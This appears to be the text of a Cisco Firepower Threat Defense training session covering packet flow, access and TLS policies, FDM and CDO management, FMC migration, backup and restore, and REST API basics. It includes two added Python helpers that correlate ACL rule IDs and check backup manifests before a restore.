Datapath: RX → L2 Decode → IP Decode, Reassembly → L4 Decode → TCP Intercept → VPN Decrypt → Route and Flow Lookup / Cluster Flow Redirect → Flow Database (existing flow: Update Flow; new flow: NAT Lookup → Advanced IP ACL Match → Flow Creation) → TCP Normalizer → TCP Proxy → Load-Balance to Snort
Inspection Engines (Snort): L2-L3 Decode → Flow Lookup (new flow: Reputation and SI; existing flow continues)
NGFW Packet Flow – Reputation & SI

• Security Intelligence (SI) can Blacklist (drop) or Whitelist (allow) IP addresses early in the packet processing lifetime within the Snort engine
• The Blacklist can be populated in 2 ways:
  • Automatically by an Intelligence Feed (Talos or custom) or a List
  • Manually by the FMC administrator
NGFW Packet Flow (diagram): as above, with the Main Access Policy added in the Snort inspection engine after Reputation and SI
NGFW Packet Flow – Main Access Policy

• Various policies are applied through the Main Access Policy:
  • Prefilter, TLS Inspection, Identities
  • Multiple match conditions, like Application, Users, Zones, …
  • Forward to IPS, File Policy
  • Logging
  • Safe Search, YouTube EDU
NGFW Packet Flow – ACL, Allow Action

• An Allow rule is pushed to the datapath as a permit action and to the advanced inspection engine as an allow action
NGFW Packet Flow – ACL, Allow Action (For Your Reference)

• The rule ID correlates datapath rules with the advanced inspection rules

firepower# show access-list
access-list CSM_FW_ACL_ line 8 remark rule-id 268435456: L7 RULE: ACP_Rule1_Allow_ICMP_App
access-list CSM_FW_ACL_ line 9 advanced permit ip host 1.1.1.1 host 2.2.2.2 rule-id 268435456
access-list CSM_FW_ACL_ line 11 remark rule-id 268435457: L4 RULE: ACP_Rule2_Allow_ICMP_Type
access-list CSM_FW_ACL_ line 12 advanced permit icmp host 2.2.2.2 host 3.3.3.3 echo rule-id 268435457

root@FTD:/home/admin# cat /var/sf/detection_engines/27306154-256d-11e6-9fc9-180edde177c5/ngfw.rules
268435456 allow any 1.1.1.1 32 any any 2.2.2.2 32 any any any (appid 3501:1)
268435457 allow any 2.2.2.2 32 8 any 3.3.3.3 32 any any 1
NGFW Packet Flow – ACL, Trust Action (For Your Reference)

• A Trust rule is pushed to the datapath as a permit action and to the advanced inspection engine as a fastpath action

firepower# show access-list
access-list CSM_FW_ACL_ line 14 remark rule-id 268435458: L7 RULE: ACP_Rule3_Trust_DNS_App
access-list CSM_FW_ACL_ line 15 advanced permit ip host 3.3.3.3 host 4.4.4.4 rule-id 268435458

root@FTD:/home/admin# cat /var/sf/detection_engines/27306154-256d-11e6-9fc9-180edde177c5/ngfw.rules
268435458 fastpath any 3.3.3.3 32 any any 4.4.4.4 32 any any any (appid 617:1)
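The rule-id correlation shown on the Allow and Trust slides above, as an added example that is not part of the session material or Cisco code: a small Python parser joins `show access-list` output with the ngfw.rules lines on the rule-id, so you can check what each ACP rule became on the datapath (permit) and in Snort (allow versus fastpath) after a deploy. The sample text is constructed from the values on the slides; the function and field names are this example's own assumptions.

```python
"""Correlate FTD datapath ACL entries with Snort ngfw.rules by rule-id.

Added example, not code from the session or from Cisco: the input text below is
constructed from the two outputs shown on the slides (`show access-list` on the
LINA datapath and ngfw.rules read from the Snort detection engine directory).
Function and field names are assumptions of this example.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Constructed sample: the slides' `show access-list` lines with wrapping removed.
SHOW_ACCESS_LIST = """\
access-list CSM_FW_ACL_ line 8 remark rule-id 268435456: L7 RULE: ACP_Rule1_Allow_ICMP_App
access-list CSM_FW_ACL_ line 9 advanced permit ip host 1.1.1.1 host 2.2.2.2 rule-id 268435456
access-list CSM_FW_ACL_ line 11 remark rule-id 268435457: L4 RULE: ACP_Rule2_Allow_ICMP_Type
access-list CSM_FW_ACL_ line 12 advanced permit icmp host 2.2.2.2 host 3.3.3.3 echo rule-id 268435457
access-list CSM_FW_ACL_ line 14 remark rule-id 268435458: L7 RULE: ACP_Rule3_Trust_DNS_App
access-list CSM_FW_ACL_ line 15 advanced permit ip host 3.3.3.3 host 4.4.4.4 rule-id 268435458
"""

# Constructed sample: the matching ngfw.rules lines from the slides.
NGFW_RULES = """\
268435456 allow any 1.1.1.1 32 any any 2.2.2.2 32 any any any (appid 3501:1)
268435457 allow any 2.2.2.2 32 8 any 3.3.3.3 32 any any 1
268435458 fastpath any 3.3.3.3 32 any any 4.4.4.4 32 any any any (appid 617:1)
"""

REMARK_RE = re.compile(r"remark rule-id (\d+): (L\d) RULE: (\S+)")
ENTRY_RE = re.compile(r"advanced (permit|deny) (.+?) rule-id (\d+)\s*$")
SNORT_RE = re.compile(r"^(\d+) (\S+) (.*)$")
APPID_RE = re.compile(r"\(appid ([^)]*)\)")


@dataclass
class RuleView:
    """What one ACP rule looks like on both sides of the box."""
    rule_id: int
    name: str = ""             # ACP rule name from the ACL remark
    layer: str = ""            # "L4" or "L7", as labelled in the remark
    datapath_action: str = ""  # permit / deny in the LINA access-list
    datapath_match: str = ""   # the 5-tuple part of the access-list entry
    snort_action: str = ""     # allow / fastpath / ... in ngfw.rules
    snort_match: str = ""      # the match part of the ngfw.rules line
    app_ids: List[str] = field(default_factory=list)  # appid tokens, if any


def parse_show_access_list(text: str) -> Dict[int, RuleView]:
    """Collect remark (name/layer) and entry (action/match) lines per rule-id."""
    views: Dict[int, RuleView] = {}
    for line in text.splitlines():
        m = REMARK_RE.search(line)
        if m:
            view = views.setdefault(int(m.group(1)), RuleView(int(m.group(1))))
            view.layer, view.name = m.group(2), m.group(3)
            continue
        m = ENTRY_RE.search(line)
        if m:
            view = views.setdefault(int(m.group(3)), RuleView(int(m.group(3))))
            view.datapath_action, view.datapath_match = m.group(1), m.group(2)
    return views


def parse_ngfw_rules(text: str, views: Dict[int, RuleView]) -> Dict[int, RuleView]:
    """Attach the Snort action and match of each ngfw.rules line to its rule-id."""
    for line in text.splitlines():
        m = SNORT_RE.match(line.strip())
        if not m:
            continue
        view = views.setdefault(int(m.group(1)), RuleView(int(m.group(1))))
        view.snort_action, view.snort_match = m.group(2), m.group(3)
        app = APPID_RE.search(view.snort_match)
        view.app_ids = app.group(1).split() if app else []
    return views


def correlate(acl_text: str, rules_text: str) -> Dict[int, RuleView]:
    """Join both outputs on the rule-id (the key the slides point out)."""
    return parse_ngfw_rules(rules_text, parse_show_access_list(acl_text))


def deep_inspected(view: RuleView) -> bool:
    """ACP Allow becomes Snort 'allow' (flow keeps being inspected); ACP Trust
    becomes Snort 'fastpath' (Snort whitelists the flow once it matches)."""
    return view.snort_action == "allow"


def find_orphans(views: Dict[int, RuleView]) -> List[int]:
    """rule-ids seen on only one side: worth a look after a policy deploy."""
    return sorted(rid for rid, v in views.items()
                  if not v.datapath_action or not v.snort_action)


if __name__ == "__main__":
    for rid, v in sorted(correlate(SHOW_ACCESS_LIST, NGFW_RULES).items()):
        print(f"{rid} {v.name:<28} datapath={v.datapath_action:<6} "
              f"snort={v.snort_action:<8} inspected={deep_inspected(v)}")
```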
NGFW Packet Flow – ACL, Trust Action: Dynamic Flow Offload

• FTD 6.3 introduces Dynamic Flow Offload
  • Dedicated hardware engine on Firepower 4100 and 9300 only
  • Default dynamic offload by Snort whitelisting
  • No Inline-Interface, no Multi-Instance support
  • Failover and Clustering support
Flow Offload Operation

• Full Inspection: new and fully inspected flows are handled by the full FTD or ASA engine on the x86 CPU complex of the Security Module
• The Offload engine in the Smart NIC is dynamically programmed after flow establishment: the x86 engine sends offload instructions, the Smart NIC returns flow updates
• Smart NIC: incoming traffic → Flow Classifier → established trusted flows → Rewrite Engine
• Flow Offload: limited state tracking, NAT/PAT, TCP sequence randomization
• 20-40 Gbps per single TCP/UDP flow, 2.9 µs UDP latency, 4M tracked flows
Dynamic Flow Offload (For Your Reference)

> show flow-offload flow
TCP intfc 102 src 10.1.201.10:40980 dest 192.168.40.200:22, dynamic, timestamp 5504317, packets 10, bytes 808

> show conn
1 in use, 4 most used
Inspect Snort:
preserve-connection: 1 enabled, 0 in effect, 2 most enabled, 0 most in effect
TCP INSIDE 192.168.40.200:22 OUTSIDE 10.1.201.10:40980, idle 0:05:32, bytes 6468, flags UIOoN1

Phase: 5
Type: SNORT
Firewall: trust/fastpath rule, id 268461071, allow
Snort id 5, NAP id 1, IPS id 0, Verdict WHITELIST
Snort Verdict: (fast-forward) fast forward this flow
NGFW Packet Flow – Main Access Policy (For Your Reference)

• Use Prefilter Policy Fastpath rules for big "fat" flows
• Place more specific rules at the top of the Access Control Policy
• Place rules that require Snort inspection at the bottom of the policy
• Avoid excessive logging
• Be aware of rule expansion
NGFW Packet Flow – Main Access Policy: Logging (For Your Reference)

• The default Syslog configuration can be overridden
NGFW Packet Flow – Main Access Policy: Identity (For Your Reference)

• The Identity Policy enables user-based authentication. The user information can be obtained in various ways:

Active Authentication:
• Captive Portal (Basic, NTLM, Kerberos)
• Remote Access VPN

Passive Authentication:
• Integration with AD (FPUA)
• Integration with ISE and ISE-PIC (pxGrid)
• Integration in VDI (Terminal Server Agent)
• Network Discovery (traffic-based detection)
NGFW Packet Flow – Main Access Policy: TLS Inspection (For Your Reference)

• The TLS Inspection Policy controls which traffic is decrypted by FTD so that other policies (ACP, File, …) can inspect the traffic
• Block TLS connections based on e.g. invalid certificates, TLS version, weak ciphers
• Don't do this. Don't use self-signed certificates!!!
NGFW Packet Flow (diagram, continued over several slides)

Inspection Engines (Snort) after Flow Lookup: Reputation and SI → Main Access Policy → Network Analysis Policy (existing flows join here) → Network Discovery → NGIPS → File/AMP Processing
NGFW Packet Flow – Advanced Malware Prevention (For Your Reference)

• A File Policy is attached to the Main Access Policy
NGFW Packet Flow (diagram, continued over several slides)

Inspection Engines (Snort): … → NGIPS → File/AMP Processing → Application Inspection → Update Flow with Verdict (back into the datapath Flow Database)
NGFW Packet Flow (diagram, completed over the last four slides; two of them marked For Your Reference)

Datapath egress after the Snort verdict: Policy-Based Routing → NAT Translate → QoS → VPN Encrypt → L3/L2 → TX
Firepower Device Manager (FDM)
Integrated on-box option for single/HA instance deployment

• Used for small or mid-size networks
• Wizard-based guided workflows
• Physical and virtual options
• S2S and RAVPN support
• High Availability
• API-first approach
• Mandatory for CDO
• No coexistence with FMC
Cabling for FTD managed by FDM - Hardware
Connect the Interfaces

• Connect GigabitEthernet 1/1 to the ISP/WAN modem or other outside device; its IP address is obtained using DHCP
• Attach GigabitEthernet 1/2 to your workstation, which obtains an IP address on the 192.168.1.0/24 network using DHCP
• Optional: directly connect to the Management port. The workstation gets an address through DHCP on the 192.168.45.0/24 network
• If you connect to a switch, ensure no other device is running a DHCP server, because it will conflict with the one running on M1/1 or Eth 1/2
Cabling for Firepower 4100 (For Your Reference)

• FTD logical device Management interface: any interface on the chassis can be used for this purpose other than the chassis management port, which is reserved for FXOS management
• Data interfaces: connect the data interfaces to your logical device data networks. You can configure physical interfaces, EtherChannels, and breakout ports to divide up high-capacity interfaces
• For High Availability, use a data interface for the failover/state link
• All interfaces other than the console port require SFP/SFP+/QSFP transceivers
• Perform the initial FTD configuration on the logical device Management interface
Setting Up the System (For Your Reference)

Default Interfaces by Device Model

Firepower Threat Defense device | Outside Interface | Inside Interface
ASA 5508/16-X | GigabitEthernet1/1 | GigabitEthernet1/2
ASA 5525/45/55-X | GigabitEthernet0/0 | GigabitEthernet0/1
Firepower 1010 | Ethernet1/1 | VLAN1 (all other switch ports)
Firepower 1120, 1140, 1150 | Ethernet1/1 | Ethernet1/2
Firepower 2100 series | Ethernet1/1 | Ethernet1/2
Firepower 4100 series | not pre-configured | not pre-configured
Firepower 9300 appliance | not pre-configured | not pre-configured
Firepower Threat Defense Virtual | GigabitEthernet0/0 | GigabitEthernet0/1
ISA 3000 | GigabitEthernet1/1 and GigabitEthernet1/3 | GigabitEthernet1/2 and GigabitEthernet1/4
Setting Up the System - Hardware (For Your Reference)

Default Configuration Settings

Setting | Default | Can be changed during initial configuration?
Password for admin user | Admin123 | Yes. You must change the default password
Management IP address | 192.168.45.45 | No
DHCP server for management clients | Management interface with the address pool 192.168.45.46 - 192.168.45.254 | No
Inside interface IP address | 192.168.1.1/24 | No
DHCP server for inside clients | Inside interface with the address pool 192.168.1.46 - 192.168.1.254 | No
DHCP auto-configuration for inside clients (supplies clients with addresses for WINS and DNS) | Enabled on outside interface | Yes, but if you configure a static IPv4 address for the outside interface, DHCP server auto-configuration is disabled
Outside interface IP address | Obtained through DHCP from Internet Service Provider (ISP) or upstream router | Yes
Cabling for FTD managed by FDM - Virtual (For Your Reference)
Connect the Interfaces

• The default configuration assumes that the management and inside interfaces connect to the same network using a switch
• Connect the "Outside" data interface to your Internet-facing gateway (i.e. edge deployments)
• The Management interface must also be connected to a gateway through which the Internet is accessible. System licensing and database updates require Internet access
Source to Destination Network Mapping (For Your Reference)

How VMware Network Adapters and Interfaces Map to FTD Interfaces

Network Adapter | Source Network | Destination Network (Physical Interface Name) | Function
Network adapter 1 | Management0-0 | Management0/0 | Management
Network adapter 2 | Diagnostic0-0 | Diagnostic0/0 | Diagnostic
Network adapter 3 | GigabitEthernet0-0 | GigabitEthernet0/0 | Outside data
Network adapter 4 | GigabitEthernet0-1 | GigabitEthernet0/1 | Inside data
Network adapter 5 | GigabitEthernet0-2 | GigabitEthernet0/2 | Data traffic
Network adapter 6 | GigabitEthernet0-3 | GigabitEthernet0/3 | Data traffic
Network adapter 7 | GigabitEthernet0-4 | GigabitEthernet0/4 | Data traffic
Network adapter 8 | GigabitEthernet0-5 | GigabitEthernet0/5 | Data traffic
Network adapter 9 | GigabitEthernet0-6 | GigabitEthernet0/6 | Data traffic
Network adapter 10 | GigabitEthernet0-7 | GigabitEthernet0/7 | Data traffic
Demo: Setting up FDM on a Firepower 4100 Series
Overview Security Policies (For Your Reference)

• SSL Decryption
  • Decrypt Re-Sign / Known Key
  • Do Not Decrypt
  • Block
• Identity Policy
  • Passive Authentication
  • Active Authentication
• Security Intelligence
  • Source/Destination IP address
  • Destination URL
  • DNS
• NAT
  • Static / Dynamic NAT
  • Dynamic Port Address Translation
  • Identity NAT
• Access Control
• Intrusion Policies
  • Balanced Security
  • Connectivity Over Security
  • Security Over Connectivity
Access Control Rules (For Your Reference)

• Source and destination IP addresses, protocol, ports and interfaces (in the form of security zones)
• Fully-qualified domain name (FQDN) of the source or destination (in the form of a network object)
• The application, categories of applications, or applications tagged with a particular characteristic (client, server, web / risk or business relevance)
• Destination URL of a web request, its generalized category, or the reputation of the target site
• The user who is making the request, or the user groups to which the user belongs
Access Control Rules

• Control which traffic is allowed to pass through and apply advanced services
• The access control policy allows, trusts or blocks access to network resources
• The policy consists of a set of ordered rules, which are evaluated from top to bottom
• The rule applied to traffic is the first one where all the traffic criteria are matched
Cisco Defense Orchestrator (CDO)
Cloud-based multi-device manager

• Management of security policies in highly distributed environments
• Achieve consistent policy implementation
• Modular architecture
• Cloud first - cloud native
• Secure by design
  • Two-factor authentication
  • Authentication calls for APIs and database operations
  • Data isolation in flight and at rest
  • Separation of roles
Cisco Defense Orchestrator (CDO) Components

• CDO Cloud
  • Staging platform
  • Stores settings, processes and writes all changes
  • Pushes the changes
  • Never talks to the customer's devices directly
• Secure Device Connector (SDC)
  • Handles the communication to the CDO cloud
  • Enables a secure connection back to your devices
  • The Cloud SDC is available by default
  • The On-Premise SDC sits behind the firewall, inside the customer network
Secure Device Connector (SDC)
Cloud SDC

• The SDC is deployed in the cloud by default
• Devices that CDO manages must allow inbound access on port 443, or whichever port you have configured for device management, from the CDO IP addresses in the EMEA region or the United States:
  • https://defenseorchestrator.eu: 35.157.12.126, 35.157.12.15
  • https://defenseorchestrator.com: 52.34.234.2, 52.36.70.147
Secure Device Connector (SDC)
On-Premises SDC

• CDO requires strict certificate checking
• No support for a web/content proxy between the SDC and the Internet
• Full outbound access to the Internet on TCP port 443
• Network connectivity to the management interface of the managed device
• Installed on-premise in the customer network, using CDO's VM or Docker images
• The VM image is available as an OVA in the CDO tenant
Software and Hardware Supported by CDO (For Your Reference)

• Firepower Threat Defense (6.4+, 6.5+)
  • ASA Firepower (ASA 5508-X, 5515-X, 5516-X, ASA 5525-X, 5545-X, 5555-X, ISA 3000)
  • VMware vSphere / VMware ESXi 6.0, 6.5, or 6.7 / KVM / Microsoft Azure
  • Firepower 1000/2100/4100/9300 Series
• ASA (9.5(2), 9.5(3), 9.6(x) to 9.13(x)) + Firepower Software (6.4+, 6.5+)
  • Does not support the ASA Service Module (ASASM)
• Meraki Security Appliance
  • MX Series
  • Meraki Templates
• Amazon Web Services VPC
• Cisco IOS

https://docs.defenseorchestrator.com/Configuration_Guides/Devices_and_Services/Software_and_Hardware_Supported_by_CDO
Demo: Onboarding an FTD Device to CDO
Detecting Out-of-Band Changes

• Changes made directly on the device without using CDO
• They cause a conflict between the device's configuration stored on CDO and the configuration stored on the device itself
• CDO polls the device every 10 minutes searching for any new changes
• When it finds one, CDO changes the configuration state of that device to the "Conflict Detected" state
Automatically Accept Out-of-Band Changes

Change Log

FTD Upgrade Prerequisites
Security Analytics and Logging (SAL) - Overview

• Capture connection, intrusion, file, malware, and Security Intelligence events from FTD devices and view them in CDO
• Events are stored in the Cisco cloud and viewable from the Event Logging page in CDO
• Optional: Stealthwatch Cloud can apply dynamic entity modeling to your FTD events to generate observations and alerts

Diagram: FTD → SDC/SEC (on-prem VM) → Cisco cloud. Logs are converted to JSON format; the cloud side consists of SSE for FTD, the FTD Event Storage Service, the NTD Service and Configuration Automation, with Stealthwatch Cloud as an optional consumer.
• FTD 6.4: the SDC (on-prem VM) with the SEC is required; it has two containers (SDC & SEC)
• FTD 6.5 can send events directly to the Cisco cloud
SAL – Installation / Configuration (For Your Reference)

• Install the Secure Event Connector on an On-Premises SDC virtual machine
• Create a Syslog Server object for Cisco Security Analytics and Logging
• Send Firepower Threat Defense events to CDO Event Logging
• View live and historical Threat Defense events in CDO
Break – 15 Minutes

FMC Migration via Backup and Restore

Firepower Management Center Model Migration

• Workflow to migrate configurations and events from one Firepower Management Center model to an equivalent or higher-capacity Firepower Management Center (e.g. FMC 1000 → FMC 2600)
• Uses the backup and restore feature
• Migration from KVM and Microsoft Azure is not supported
• First introduced with Version 6.5
Supported Migration Paths (For Your Reference)

Source Model | FMCv | AWS | FMC 1600 | FMC 2600 | FMC 4600 | FMCv 300
AWS | Yes | — | Yes | Yes | Yes | Yes
FMCv 25 | — | Yes | Yes | Yes | Yes | Yes
FMC 1000 | — | — | Yes | Yes | Yes | Yes
FMC 1600 | — | — | — | Yes | Yes | Yes
FMC 2000 | — | — | — | Yes | Yes | Yes
FMC 2500 | — | — | — | Yes | Yes | Yes
FMC 2600 | — | — | — | — | Yes | Yes
FMCv 300 | — | — | — | Yes | Yes | —
FMC 4000 | — | — | — | — | Yes | —
FMC 4500 | — | — | — | — | Yes | —
FMC Migration Procedure

Source FMC:
1. Create a backup file
3. Copy the generated backup file to the target
6. Unregister from the Smart Software Manager
7. Disconnect the FMC from the network

Target FMC:
2. Set up the target FMC
4. Disconnect the FMC from the network
5. Execute the migration script
8. Connect the FMC to the network
9. Enable smart licensing
Guidelines and Limitations (For Your Reference)

• If you change the FMC IP address after migration, you must also update the NAT configuration between the FMC and its managed devices (for more information, see NAT Environments)
• All FMC licensing modes and High Availability setups are supported - evaluation, connected and SLR
• You must de-register licenses from the source FMC and register licenses on the target FMC after migration
• Ensure that the target FMC has the same number of interfaces as the source FMC
• Verify that the target FMC version matches the source FMC version (including patch, VDB, and SRU)
FTD Backup and Restore

Backup and Restore Capabilities

• Physical and virtual devices
• Backed-up data: configurations only
• Save backup to: device, FMC or remote storage
• Scheduling via FMC or FDM
• Recurring backup schedule only via FDM
• KVM, AWS, Azure, clustered devices and container instances are not supported!
• The platform must be the same as the one of the backup to be restored
• Best practice: back up to a remote location and verify transfer success
Backup file format & Backup Information File (For Your Reference)

• Backup file format for standalone and HA:
  • Standalone: <hostname>_<timestamp>.tar
  • HA nodes: <hostname>_<PRIMARY/SECONDARY>_<timestamp>.tar
• The backup info file is placed as conf in the etc/sf path within the backup tar
• Before the restore operation is performed, the backup image is verified using the manifest details (combination of MODEL NUMBER & MODEL ID, SW VERSION)
• The backup info contents are displayed and the user is asked to confirm before the actual restore is performed
CLI – restore remote-manager-backup

> restore remote-manager-backup
  location    This command is used to restore FTD backup file present remotely from sfr prompt
  String      restoring needs a file
> restore remote-manager-backup FTD-IFT_20190214124149.tar

***********************************************
Backup Details
***********************************************
Model = Cisco Firepower 2130 Threat Defense
Software Version = 6.3.0
Serial = JAD211800XX
Hostname = FTD-IFT
IP Address = 10.62.148.185
VDB Version = 299
SRU Version = 2018-08-23-001-vrt
Manager IP(s) = 10.62.148.207
Backup Date = 2019-02-14 12:41:49
Backup Filename = FTD-IFT_20190214124149.tar
***********************************************

********************* Caution ****************************
Verify that you are restoring a valid backup file. Make sure that software, SRU and VDB Versions on this device match versions from
the backup manifest before proceeding.
Restore operation will overwrite all configurations on this device with the configurations in backup. Kindly ensure the old device is
disconnected from the network to avoid
IP conflict.
**********************************************************

Are you sure you want to continue (Y/N)
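The backup filename conventions from the previous slide and the manifest checks the restore caution asks for, as an added example that is not part of the session material or Cisco code: it parses the backup filename and the Backup Details block, then lists every mismatch against the device (model, software version, VDB, SRU, plus a filename that disagrees with its own manifest) before an operator answers Y. The manifest text is the slide's; the device facts and all function names are constructed assumptions.

```python
"""Pre-restore checks for an FTD backup file.

Added example, not code from the session or from Cisco: it implements the
filename conventions and the manifest comparison the slides describe
(model, software version, VDB and SRU must match before restoring). The
sample manifest text is the 'Backup Details' block shown on the slide; the
device facts and all function names are constructed assumptions.
"""
import re
from datetime import datetime
from typing import Dict, List, NamedTuple, Optional

# <hostname>_<timestamp>.tar or <hostname>_<PRIMARY|SECONDARY>_<timestamp>.tar
BACKUP_NAME_RE = re.compile(
    r"^(?P<host>.+?)(?:_(?P<role>PRIMARY|SECONDARY))?_(?P<ts>\d{14})\.tar$")

# The manifest fields the restore caution tells you to compare with the device.
MANIFEST_CHECKS = ("Model", "Software Version", "VDB Version", "SRU Version")

# Constructed sample: the Backup Details block from the slide.
BACKUP_DETAILS = """\
***********************************************
Backup Details
***********************************************
Model = Cisco Firepower 2130 Threat Defense
Software Version = 6.3.0
Serial = JAD211800XX
Hostname = FTD-IFT
IP Address = 10.62.148.185
VDB Version = 299
SRU Version = 2018-08-23-001-vrt
Manager IP(s) = 10.62.148.207
Backup Date = 2019-02-14 12:41:49
Backup Filename = FTD-IFT_20190214124149.tar
***********************************************
"""

# Constructed sample: what the replacement device reports about itself.
MATCHING_DEVICE = {
    "Model": "Cisco Firepower 2130 Threat Defense",
    "Software Version": "6.3.0",
    "VDB Version": "299",
    "SRU Version": "2018-08-23-001-vrt",
}


class BackupName(NamedTuple):
    hostname: str
    role: Optional[str]   # PRIMARY / SECONDARY for HA nodes, None for standalone
    taken_at: datetime


def parse_backup_filename(name: str) -> BackupName:
    """Split an FTD backup filename into hostname, HA role and timestamp."""
    m = BACKUP_NAME_RE.match(name)
    if not m:
        raise ValueError(f"not an FTD backup filename: {name}")
    return BackupName(m.group("host"), m.group("role"),
                      datetime.strptime(m.group("ts"), "%Y%m%d%H%M%S"))


def parse_backup_details(text: str) -> Dict[str, str]:
    """Turn the 'Key = Value' lines of the Backup Details block into a dict."""
    details: Dict[str, str] = {}
    for line in text.splitlines():
        key, sep, value = line.partition(" = ")
        if sep:
            details[key.strip()] = value.strip()
    return details


def restore_mismatches(details: Dict[str, str], device: Dict[str, str]) -> List[str]:
    """Manifest fields that differ from the device; an empty list means they all match."""
    problems = []
    for key in MANIFEST_CHECKS:
        if details.get(key) != device.get(key):
            problems.append(f"{key}: backup={details.get(key)!r} device={device.get(key)!r}")
    return problems


def check_restore(filename: str, details: Dict[str, str], device: Dict[str, str]) -> List[str]:
    """Everything to clear before answering Y at the restore prompt: manifest/device
    mismatches, plus a filename whose hostname or timestamp disagrees with the manifest."""
    problems = restore_mismatches(details, device)
    name = parse_backup_filename(filename)
    if details.get("Hostname") != name.hostname:
        problems.append(f"Hostname: manifest={details.get('Hostname')!r} filename={name.hostname!r}")
    stamped = datetime.strptime(details["Backup Date"], "%Y-%m-%d %H:%M:%S")
    if stamped != name.taken_at:
        problems.append(f"Backup Date {stamped} does not match filename timestamp {name.taken_at}")
    return problems


if __name__ == "__main__":
    details = parse_backup_details(BACKUP_DETAILS)
    print(check_restore("FTD-IFT_20190214124149.tar", details, MATCHING_DEVICE) or "OK to restore")
```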
Demo: Device RMA
FTD Migration

Migration Tool Paths
Stateful Firewall to NGFW

• Firepower Migration Tool (desktop tool): upload the configuration → shared FMT core engine* → API calls to the Firepower Management Center → deploy to Firepower Threat Defense managed by FMC
• CDO FMT service (cloud service in Cisco Defense Orchestrator): upload → template creation → apply to Firepower Threat Defense managed by FDM

*features shared in CDO depend on FTD-API and CDO support
What can I migrate to FTD?

• Supported ASA versions: 8.4 and later (all platforms)
• Check Point OS
  • Versions: R75, R76, R77, R77.10, R77.20, and R77.30
  • Platforms: Windows, Secure Platform, Secure Platform 2.6, Solaris, Linux, Gaia
• Supported FMC versions: 6.2.3.3 or later
• The Firepower Migration Tool has the following platform requirements:
  • Windows 10 operating system, or macOS version 10.13 or higher
  • Google Chrome browser
Migration Workflow Steps (For Your Reference)

Pre-Migration Tasks

• Config Extract
  • Use the latest config file from the source device
  • Review what is supported by the tool and what needs to be manually migrated
  • Optimize the config*
  • Choose the manager of choice
• Device Setup
  • Bootstrap the target device interfaces
  • Set up management access and connect to the manager of choice
  • Enable licensing
  • Set up interface mapping with the source device
  • Configure platform settings
• Pre Tool Execution
  • Download the latest build of the tool
  • Enable Cisco Success Telemetry
  • Do not make changes on the management platform of the target device
  • Create a user account with admin privilege for migration on the management platform

During Migration Tasks

• During Execution
  • Shut down the source device
  • Clear ARP from the connected Layer 2/3 infrastructure
  • Review the reports generated during pre and post migration
  • Carefully map the interfaces
  • Use built-in optimizations like Do Not Migrate

Post Migration Tasks

• Post Migration
  • Review the Post Migration Report
  • Log in to FMC to verify the migrated config
  • Migrate VPN using the Migration Guides
  • Review the Pre Migration report and manually migrate the remaining relevant config
• Finish Migration
  • Deploy/Apply the configuration to the device
  • Save the Post-Migration report for future reference as the Day 0 config file
  • Perform a connectivity test to ensure traffic flow
ASA Configurations

• Methods to obtain an ASA configuration file:
  • Export the ASA configuration file
  • Connect to the ASA from the Firepower Migration Tool
• Pre-migration report that identifies the following:
  • ASA configuration items that will be fully migrated, partially migrated, unsupported for migration and ignored for migration
  • ASA configuration lines with errors: lists the ASA CLIs that the tool cannot recognise; this blocks migration
  • You can rectify the issues and re-upload a new configuration
• Supports the "show tech-support" command in the manual upload method for multiple-context ASA
Supported Check Point configuration (For Your Reference)

• Interfaces
• Static Routes
• Objects (Network objects and groups, Service objects)
• Access Control Policy
  • Global Policy - When you select this option, the source and destination zones for the ACL policy are migrated as Any
  • Zone-Based Policy - Source and Destination Zones will be migrated based on the predictive routing mechanism*
• Network Address Translation

*Static routes, dynamic routes, connected routes (network information on interfaces) and the default route are taken into consideration to derive egress zones. PBR and NAT will not be taken into consideration to map zones. Rule explosion can occur depending on the nature of the source and destination network objects/groups.
End-to-End Procedure for FTD Migration

1. Launch the Firepower Migration Tool
2. Upload the ASA Config
3. Parse the ASA Config
4. Log in to the FMC (Firepower Management Center)
5. Fetch FMC Global Domain Details
6. Fetch FTD Details
7. Fetch FMC Interfaces
8. Fetch FMC Zones
9. Fetch FMC Interface Groups
10. Map Interfaces, Zones and Interface Groups (Automatic Map or Manual Map)
11. Push the Config to the FTD Device
Demo: Firepower Migration Tool – Desktop Edition
REST API
Overview
REST API Basics

• Each policy is modelled as a resource
• Use HTTP methods (POST, GET, PUT/PATCH, DELETE) for CRUD (Create/Read/Update/Delete) operations on a given resource
• Uses JSON (JavaScript Object Notation) as the interface
• JSON objects are written in key/value pairs

• Sample JSON for a resource:

    {
      "host": {
        "kind": "IPv4Address",
        "value": "1.10.8.10"
      },
      "kind": "object#NetworkObj",
      "name": "Demo_NObj_1190",
      "objectId": "Demo_NObj_1190"
    }
Request Structure

• Non-bulk request methods:
  • GET – Retrieves data from the specified object
  • PUT – Adds the supplied information to the specified object; returns a 404 “Resource Not Found” error if the object does not exist
  • POST – Creates the object with the supplied information
  • DELETE – Deletes the specified object
  • PATCH – FMC does not support it (other systems use it for partial modifications)
• Bulk request method:
  • POST – create/update/partial-update/remove of several (1000) resource objects in one request
REST API from FMC 6.1

• API Explorer/Browser with example code
• Packaged with FMC software, no license required
• Totally concurrent with the other management option (FMC GUI)
• For FTD and FTDv, the type of interfaces supported depends on:
  • Mode (Routed/Transparent)
  • Form-factor (Physical/Virtual)

Workflow: 1. From a web browser, invoke the API Explorer on the FMC (the FMC hosts both the API Explorer and the REST API); 2. Use the API Explorer UI to make REST API calls, which the FMC applies to its managed devices
Supported Features in FMC 6.1

• Management for: FTD, Firepower Services, Appliance/Services
• Gathers information about devices, objects and several types of policies
• Creates access control policies and access control policy rules
• Deploys policies to devices

Feature | Access Rights
Setup Device | C (register), RUD (deregister)
Device Group | CRUD
Interfaces | Read only for FTD, CRUD on Firepower appliances
Access Control Policy and Rules | CRUD
IPS Policy | Read only on all
Deploy | Supported on all
Operational Status - Statistics | Supported on all
Supported Features from FMC 6.4 and 6.5

• Added REST API objects to support Version 6.4 features:
  • Manage Cisco Threat Response integration
  • Manage chassis clustering
  • Manage hit count statistics for access control and prefilter rules
  • Manage logging settings for access control policies
• 6.4: New API Explorer based on the OpenAPI Specification (OAS)
  • You now use CodeGen to generate sample code; you can still access the legacy API Explorer if you prefer
• From 6.5:
  • Regional clouds
  • Added the following REST API objects to support older features:
    • Categories for access control rules
    • Domains and policy inheritance
    • Prefilter policies
    • VLAN interfaces (available on a Firepower 1010 device)
Best Practices

• Keep UI users and script users separate; especially, do not use the admin account as an API user
• Do not give script users more privilege than needed
• Always validate the content coming from the server
• There is no specific REST API role for admins
